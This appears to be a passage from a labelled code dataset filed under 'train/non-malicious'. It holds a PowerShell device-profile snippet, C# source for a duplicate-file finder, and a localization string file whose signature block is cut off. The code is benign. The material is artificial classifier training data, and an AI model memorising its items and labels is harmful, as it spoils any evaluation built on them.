Get-AndroidEnrollmentProfile if($Profiles){ Write-Host "Corporate-owned dedicated device Profiles found..." -ForegroundColor Green foreach ($Profile in $Profiles){ $Profile } } else { Write-Host "No Corporate-owned dedicated device Profiles found..." -ForegroundColor Yellow } Write-Host
combined_dataset/train/non-malicious/Findup_17.ps1
Findup_17.ps1
using System; using System.Collections; using System.Collections.Generic; using System.Text; using System.Security.Cryptography; using System.Runtime.InteropServices; using Microsoft.Win32; using System.IO; using System.Text.RegularExpressions; namespace Findup { public class FileLengthComparer : IComparer<FileInfo> { public int Compare(FileInfo x, FileInfo y) { return (x.Length.CompareTo(y.Length)); } } class Findup { public static System.String[] paths = new string[0]; public static System.String[] excpaths = new string[0]; public static System.String[] incpaths = new string[0]; public static System.Boolean noerr = false; public static System.Boolean useregex = false; public static System.Boolean includeflag = false; public static void Main(string[] args) { Console.WriteLine("Findup.exe v2.0 - By James Gentile - JamesRaymondGentile@gmail.com - 2012."); Console.WriteLine(" "); System.Boolean recurse = false; System.Boolean exc = false; System.Boolean inc = false; List<FileInfo> files = new List<FileInfo>(); long numOfDupes = 0; // number of duplicate files found. long dupeBytes = 0; // number of bytes in duplicates. int i = 0; for (i = 0; i < args.Length; i++) { if ((System.String.Compare(args[i], "-help", true) == 0) || (System.String.Compare(args[i], "-h", true) == 0)) { Console.WriteLine("Usage: findup.exe <file/directory #1> <file/directory #2> ... <file/directory #N> [-recurse] [-noerr] [-x] <files/directories/regx> [-regex]"); Console.WriteLine(" "); Console.WriteLine("Options: -help - displays this help message."); Console.WriteLine(" -recurse - recurses through subdirectories when directories or file specifications (e.g. *.txt) are specified."); Console.WriteLine(" -noerr - discards error messages."); Console.WriteLine(" -x - eXcludes all directories\\\\files (or RegEx if -regex used) including subdirs following this switch until another switch is used."); Console.WriteLine(" -i - Include only directories\\\\files (or RegEx if -regex used) including subdirs following this switch until another switch is used."); Console.WriteLine(" -regex - Use Regex notation for exclude (-x) and include (-i) option."); Console.WriteLine(" "); Console.WriteLine("Examples: findup.exe c:\\\\finances -recurse -noerr"); Console.WriteLine(" - Find dupes in c:\\\\finance."); Console.WriteLine(" - recurse all subdirs of c:\\\\finance."); Console.WriteLine(" - suppress error messages."); Console.WriteLine(" findup.exe c:\\\\users\\\\alice\\\\plan.txt d:\\\\data -recurse -x d:\\\\data\\\\webpics"); Console.WriteLine(" - Find dupes in c:\\\\users\\\\alice\\\\plan.txt, d:\\\\data"); Console.WriteLine(" - recurse subdirs in d:\\\\data."); Console.WriteLine(" - exclude any files in d:\\\\data\\\\webpics and subdirs."); Console.WriteLine(" findup.exe c:\\\\data *.txt c:\\\\reports\\\\quarter.doc -x \\"(?:jim)\\" -regex"); Console.WriteLine(" - Find dupes in c:\\\\data, *.txt in current directory and c:\\\\reports\\\\quarter.doc"); Console.WriteLine(" - exclude any file with 'jim' in it as specified by the Regex item \\"(?:jim)\\""); Console.WriteLine(" findup.exe c:\\\\data *.txt c:\\\\reports\\\\quarter.doc -x \\"(?:jim)\\" -i \\"(?:smith)\\" -regex"); Console.WriteLine(" - Find dupes in c:\\\\data, *.txt in current directory and c:\\\\reports\\\\bobsmithquarter.doc"); Console.WriteLine(" - Include only files with 'smith' and exclude any file with 'jim' in it as specified by the Regex items \\"(?:jim)\\",\\"(?:smith)\\""); Console.WriteLine("Note: Exclude takes precedence over Include."); return; } if (System.String.Compare(args[i], "-recurse", true) == 0) { recurse = true; inc = false; exc = false; continue; } if (System.String.Compare(args[i], "-regex", true) == 0) { useregex = true; inc = false; exc = false; continue; } if (System.String.Compare(args[i], "-noerr", true) == 0) { noerr = true; inc = false; exc = false; continue; } if (System.String.Compare(args[i], "-i", true) == 0) { inc = true; exc = false; continue; } if (System.String.Compare(args[i], "-x", true) == 0) { exc = true; inc = false; continue; } if (exc == true) { Array.Resize(ref excpaths, excpaths.Length + 1); excpaths[excpaths.Length - 1] = args[i]; continue; } if (inc == true) { Array.Resize(ref incpaths, incpaths.Length + 1); incpaths[incpaths.Length - 1] = args[i]; includeflag = true; continue; } else { Array.Resize(ref paths, paths.Length + 1); paths[paths.Length - 1] = args[i]; } } if (paths.Length == 0) { WriteErr("No files, file specifications, or directories specified. Try findup.exe -help"); return; } Console.Write("Getting file info..."); getFiles(paths, "*.*", recurse, files); Console.WriteLine("Completed!"); if (files.Count < 2) { WriteErr("Findup.exe needs at least 2 files to compare. Try findup.exe -help"); return; } Console.Write("Sorting file list..."); files.Sort(new FileLengthComparer()); Console.WriteLine("Completed!"); Console.Write("Computing SHA512 & Size matches..."); var SizeHashName = new Dictionary<long, Dictionary<string,List<string>>>(); for (i = 0; i < (files.Count - 1); i++) { if (files[i].Length != files[i + 1].Length) { continue; } var breakout = false; while (true) { var _SHA512 = SHA512.Create(); try { using (var fstream = File.OpenRead(files[i].FullName)) { _SHA512.ComputeHash(fstream); } System.Text.Encoding enc = System.Text.Encoding.ASCII; string SHA512string = enc.GetString(_SHA512.Hash); if (SizeHashName.ContainsKey(files[i].Length)) { if (!SizeHashName[files[i].Length].ContainsKey(SHA512string)) { SizeHashName[files[i].Length][SHA512string] = new List<string>() {}; } } else { SizeHashName.Add(files[i].Length, new Dictionary<string,List<string>>()); SizeHashName[files[i].Length][SHA512string] = new List<string>() {}; } SizeHashName[files[i].Length][SHA512string].Add(files[i].FullName); } catch (Exception e) { WriteErr("Hash error: " + e.Message); } if (breakout == true) {break;} i++; if (i == (files.Count - 1)) { breakout = true; continue; } if (files[i].Length != files[i + 1].Length) { breakout = true; } } } Console.WriteLine("Completed!"); foreach (var SizeGroup in SizeHashName) { foreach (var HashGroup in SizeGroup.Value) { if (HashGroup.Value.Count > 1) { Console.WriteLine("Duplicates (size: {0:N0} Bytes) - ", (long)SizeGroup.Key); foreach (var FileName in HashGroup.Value) { Console.WriteLine(FileName); numOfDupes++; dupeBytes += (long)SizeGroup.Key; } } } } Console.WriteLine("\\n "); Console.WriteLine("Files checked : {0:N0}", files.Count); Console.WriteLine("Duplicate files : {0:N0}", numOfDupes); Console.WriteLine("Duplicate bytes : {0:N0}", dupeBytes); return; // Exit after displaying statistics. } private static void WriteErr(string Str) { if (noerr == false) Console.WriteLine(Str); } private static Boolean CheckExcludes(string Path) { foreach (var x in excpaths) { if (useregex == true) { try { Regex rgx = new Regex(x); if (rgx.IsMatch(Path)) return false; } catch (Exception e) { WriteErr("Invalid regex used: " + x + " exception: " + e); } } else { if (Path.ToLower().StartsWith(x.ToLower())) { return false; } } } return true; } private static Boolean CheckIncludes(string Path) { if (!includeflag) { return true; } foreach (var i in incpaths) { if (useregex == true) { try { Regex rgx = new Regex(i); if (rgx.IsMatch(Path)) return true; } catch (Exception e) { WriteErr("Invalid regex used: " + i + " exception: " + e); } } else {if (Path.ToLower().StartsWith(i.ToLower())) { return true; }} } return false; } private static void getFiles(string[] pathRec, string searchPattern, Boolean recursiveFlag, List<FileInfo> returnList) { foreach (string d in pathRec) { getFiles(d, searchPattern, recursiveFlag, returnList); } return; } private static void getFiles(string pathRec, string searchPattern, Boolean recursiveFlag, List<FileInfo> returnList) { string dirPart; string filePart; if (File.Exists(pathRec)) { try { FileInfo addf = (new FileInfo(pathRec)); if (((addf.Attributes & FileAttributes.ReparsePoint) == 0) && CheckExcludes(addf.FullName) && CheckIncludes(addf.FullName)) returnList.Add(addf); } catch (Exception e) { WriteErr("Add file error: " + e.Message); } } else if (Directory.Exists(pathRec)) { try { DirectoryInfo Dir = new DirectoryInfo(pathRec); foreach (FileInfo addf in (Dir.GetFiles(searchPattern))) { if (((addf.Attributes & FileAttributes.ReparsePoint) == 0) && CheckExcludes(addf.FullName) && CheckIncludes(addf.FullName)) returnList.Add(addf); } } catch (Exception e) { WriteErr("Add files from Directory error: " + e.Message); } if (recursiveFlag == true) { try { getFiles((Directory.GetDirectories(pathRec)), searchPattern, recursiveFlag, returnList); } catch (Exception e) { WriteErr("Add Directory error: " + e.Message); } } } else { try { filePart = Path.GetFileName(pathRec); dirPart = Path.GetDirectoryName(pathRec); } catch (Exception e) { WriteErr("Parse error on: " + pathRec); WriteErr(@"Make sure you don't end a directory with a \\ when using quotes. The console arg parser doesn't accept that."); WriteErr("Exception: " + e.Message); return; } if (filePart.IndexOfAny(new char[] {'?','*'}) >= 0) { if ((dirPart == null) || (dirPart == "")) dirPart = Directory.GetCurrentDirectory(); if (Directory.Exists(dirPart) && CheckExcludes(dirPart) && CheckIncludes(dirPart)) { getFiles(dirPart, filePart, recursiveFlag, returnList); return; } } WriteErr("Invalid file path, directory path, file specification, or program option specified: " + pathRec); } } } }
combined_dataset/train/non-malicious/sample_20_16.ps1
sample_20_16.ps1
ConvertFrom-StringData @' id_detectlowpathmtu_activity=Detect low Path MTU id_detectlowpathmtu_status=Checking network adapters for low Path MTU connections. '@ # SIG # Begin signature block # MIIoVQYJKoZIhvcNAQcCoIIoRjCCKEICAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAeuuHoZ1tEwZKx # PPrIymN/bmqwKul2Ro7ckOV41QaOYaCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIBLN # 801NKC0GyfQP7cpR5nvyVmWplS07GpF6UVYyEfjwMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAOUgxhXfBPNStrHYW9m+9TcIB7TmglRG1XQ49 # 0MiWa+oMENYnq3mD4w35ZIoZ5+Hc5IA75yxi7+d0gCItWhld1GkOAPjIvXQ7jBZi # xfjL1aPrnqcWZjUP1sho2ETkYFelVPfKKHi0p0PwkoN/N8wEdYSw+irCVryj0ciw # 7fMn9NjB4dEYhDPns73t9J+ug7kTSx4+Sknto9zC6kdkJVnDYPdT2wzM2o7eZrwU # iZ1EF4lUr02CdHBJ0Oo+I6nFiWHEKVXp2WWqXggXKFOMJ24lT0PUEM79Asa/1YCJ # qZaVK7jzmqfU4bqUTzExMJ0HYjW2NM5s9TS8lTU7hedUN5byj6GCF7AwghesBgor # BgEEAYI3AwMBMYIXnDCCF5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCCpY22Oql4jCGlm/9xDE87kJDsp0A/BjxSk # 3K5+U5Nc+wIGZutZ6YJBGBMyMDI0MTAyODExNDA0Mi4yMjJaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo1MjFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAACAAvX # qn8bKhdWAAEAAAIAMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEyMVoXDTI1MTAyMjE4MzEyMVowgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjUyMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # r1XaadKkP2TkunoTF573/tF7KJM9Doiv3ccv26mqnUhmv2DM59ikET4WnRfo5biF # IHc6LqrIeqCgT9fT/Gks5VKO90ZQW2avh/PMHnl0kZfX/I5zdVooXHbdUUkPiZfN # XszWswmL9UlWo8mzyv9Lp9TAtw/oXOYTAxdYSqOB5Uzz1Q3A8uCpNlumQNDJGDY6 # cSn0MlYukXklArChq6l+KYrl6r/WnOqXSknABpggSsJ33oL3onmDiN9YUApZwjnN # h9M6kDaneSz78/YtD/2pGpx9/LXELoazEUFxhyg4KdmoWGNYwdR7/id81geOER69 # l5dJv71S/mH+Lxb6L692n8uEmAVw6fVvE+c8wjgYZblZCNPAynCnDduRLdk1jswC # qjqNc3X/WIzA7GGs4HUS4YIrAUx8H2A94vDNiA8AWa7Z/HSwTCyIgeVbldXYM2Bt # xMKq3kneRoT27NQ7Y7n8ZTaAje7Blfju83spGP/QWYNZ1wYzYVGRyOpdA8Wmxq5V # 8f5r4HaG9zPcykOyJpRZy+V3RGighFmsCJXAcMziO76HinwCIjImnCFKGJ/IbLjH # 6J7fJXqRPbg+H6rYLZ8XBpmXBFH4PTakZVYxB/P+EQbL5LNw0ZIM+eufxCljV4O+ # nHkM+zgSx8+07BVZPBKslooebsmhIcBO0779kehciYMCAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBSAJSTavgkjKqge5xQOXn35fXd3OjAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAKPCG9njRtIqQ+fuECgxzWMsQOI3HvW7sV9PmEWCCOWlTuGCIzNi3ibdL # ZS0b2IDHg0yLrtdVuBi3FxVdesIXuzYyofIe/alTBdV4DhijLTXtB7NgOno7G12i # O3t6jy1hPSquzGLry/2mEZBwIsSoS2D+H+3HCJxPDyhzMFqP+plltPACB/QNwZ7q # +HGyZv3v8et+rQYg8sF3PTuWeDg3dR/zk1NawJ/dfFCDYlWNeCBCLvNPQBceMYXF # RFKhcSUws7mFdIDDhZpxqyIKD2WDwFyNIGEezn+nd4kXRupeNEx+eSpJXylRD+1d # 45hb6PzOIF7BkcPtRtFW2wXgkjLqtTWWlBkvzl2uNfYJ3CPZVaDyMDaaXgO+H6Di # rsJ4IG9ikId941+mWDejkj5aYn9QN6ROfo/HNHg1timwpFoUivqAFu6irWZFw5V+ # yLr8FLc7nbMa2lFSixzu96zdnDsPImz0c6StbYyhKSlM3uDRi9UWydSKqnEbtJ6M # k+YuxvzprkuWQJYWfpPvug+wTnioykVwc0yRVcsd4xMznnnRtZDGMSUEl9tMVneb # YRshwZIyJTsBgLZmHM7q2TFK/X9944SkIqyY22AcuLe0GqoNfASCIcZtzbZ/zP4l # T2/N0pDbn2ffAzjZkhI+Qrqr983mQZWwZdr3Tk1MYElDThz2D0MwggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # 